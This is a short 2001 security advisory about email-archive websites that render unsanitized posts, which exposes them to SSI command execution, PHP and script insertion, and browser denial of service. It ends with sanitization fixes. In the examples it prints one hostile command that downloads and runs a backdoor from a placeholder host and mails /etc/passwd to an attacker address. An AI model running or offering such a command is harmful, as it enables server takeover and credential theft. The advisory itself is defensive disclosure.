admin@cgisecurity.com
          Email Archives may allow Distributed Attacks against users and Web servers
                                








I Introduction

Mailing lists are often archived for later viewing on websites. The software
that archives these email messages may allow an attacker to execute commands,
include false information, cause a wide scale browser DOS, and other possibilities.

Millions of sites archive these mailing lists and each site archiving a malicious post
could either be attacked or help launch an attack.





II Examples:

Server Side Includes

If an attacker sends a email with a Server Side include(SSI) tag it may be possible
to carry out the following attack types listed below.

* (Client side) Including of large files, which may lead in a small Denial of Service of clients.
  (Bandwidth consumption, Memory consumption, etc...)

* (Client/Server side) Including of local files such as /dev/urandom. Which will not only 
  slow down the server and eat up bandwidth , but possibly DOS the client viewing the page.

* (Server side) Commands to get executed. The server may execute the SSI request if the server 
  is configured correctly. This could lead to possible web server compromise. With the right 
  series of commands an attacker could download and install a backdoor with web server privileges.


Below is a example to give you an idea.

id;wget http://host/backdoor.c;cc backdoor.c;./a.out <port to listen on>;mail attacker@host </etc/passwd;
(Just a random example)

Then the attacker would just need to telnet to the port specified within
the trojan and he would be greeted by a shell with the user rights of the 
web server. With a local account an attacker could locally exploit your 
machine to gain administrative privileges.

 
Possible forging of other users posts:

(A More advanced method, which would be on a mail archiving script basis. 
One would have to learn the output of a post along with it's formatting, 
and then it may be possible to forge a reply from another user.)



Browser Denial of service:

Some browsers have holes which can lead to either a browser or system crash. This would
occur when an email had been sent with the proper html/JavaScript tags. The email would
be archived. With some archiving software the html isn't striped , and it is included
on the website page your viewing.



Malicious JavaScript/Java applets:

May be possible depending on browser security settings.



PHP Insertion:

May allow command execution or file includes depending on archiving software.



Other Markup Languages:

Any other markup language which may allow file includes, or command execution.





III Solutions :

* An example of a solution would be to program these achievers to add a slash
  whenever a < and > is present to help prevent execution of html/other.
  (Example: <b>hi</b> becomes <\b>hi<\/b> or becomes <\b/>hi<\/b/> ) 

* Removing the < and > all together , but if program code or math is involved
  in the post it may remove important information.

* The best solution would be to print out the archives in txt format so no 
  code can be executed.





Published to the Public October 2001
Copyright October 2001 Cgisecurity.com